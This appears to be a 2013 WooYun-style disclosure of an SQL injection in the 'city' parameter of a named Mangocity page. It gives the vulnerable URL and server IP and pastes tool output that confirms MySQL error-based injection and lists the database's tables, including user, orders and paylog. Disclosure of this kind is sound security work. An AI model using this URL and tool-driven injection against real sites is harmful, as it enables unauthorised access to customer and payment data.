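2013-09-23: Details reported to the vendor; awaiting vendor handling
2013-09-28: The vendor chose to ignore the vulnerability; details disclosed to the public
SQL injection vulnerability in a Mangocity (芒果网) page
URL: http://tuan.mangocity.com/product/productList.aspx?city=%e4%b8%89%e4%ba%9a&productCount=1314
Ran it with the "carrot" tool (胡萝卜)..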
Analyzing http://tuan.mangocity.com/product/productList.aspx?city=%e4%b8%89%e4%ba%9a&productCount=1314 with 2 input parameter(s)
Test parameter: productCount
Host IP: 183.62.144.234
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
Unable to find a suitable keyword. Nevertheless, continuing...
Unable to detect server type! But there may still be a chance.
Cannot find column count!
Testing for MySQL error based injection method
Testing for MsSQL error based injection method
Bypassing illegal union failed! Turning off this feature
Changing inejction syntax
MsSQL error based injection method cant be used!
MsSQL time based injection method can't be used
MySQL time based injection method can't be used
It seems that input parameter is not effective! Check the following:
 Are you sure that the input parameter really exists?!
 Are you sure that the input value '1314' is valid?
 Are you sure that the 'GET' method is correct?
Reanalyzing for string type syntax.
Unable to detect server type! But there may still be a chance.
Cannot find column count!
Testing for MySQL error based injection method
Changing inejction syntax
MsSQL error based injection method cant be used!
MsSQL time based injection method can't be used
MySQL time based injection method can't be used
It seems that input parameter is not effective! Check the following:
 Are you sure that the input parameter really exists?!
 Are you sure that the input value '1314' is valid?
 Are you sure that the 'GET' method is correct?
Test parameter: city
Keyword Found: ¥1799
DB Server: MySQL >=5
Trying another method using keyword for finding columns count
Finding columns count for MySQL failed!
Current DB: tuan
MySQL error based injection method can be used!
Count(table_name) of information_schema.tables where table_schema=0x7475616E is 20
Can not get all tables by group_concat!
Count(table_name) of information_schema.tables where table_schema=0x7475616E is 20
Bypassing illegal union failed! Turning off this feature
Table found: cityinfo
Table found: ctripproduct
Table found: hotel
Table found: hoteltemp
Table found: invoice
Table found: orderlog
Table found: orders
Table found: paraminfo
Table found: paylog
Table found: picture
Table found: product
Table found: productbak
Table found: systemlog
Table found: szone
Table found: test
Table found: test2
Table found: ticket
Table found: user
Table found: waitsendmsg
Table found: xzone
Didn't dig any further..
I don't know..
Severity: No impact (ignored by vendor)
Ignored at: 2013-09-28 10:59
Vulnerability Rank: 5 (WooYun assessment)
None yet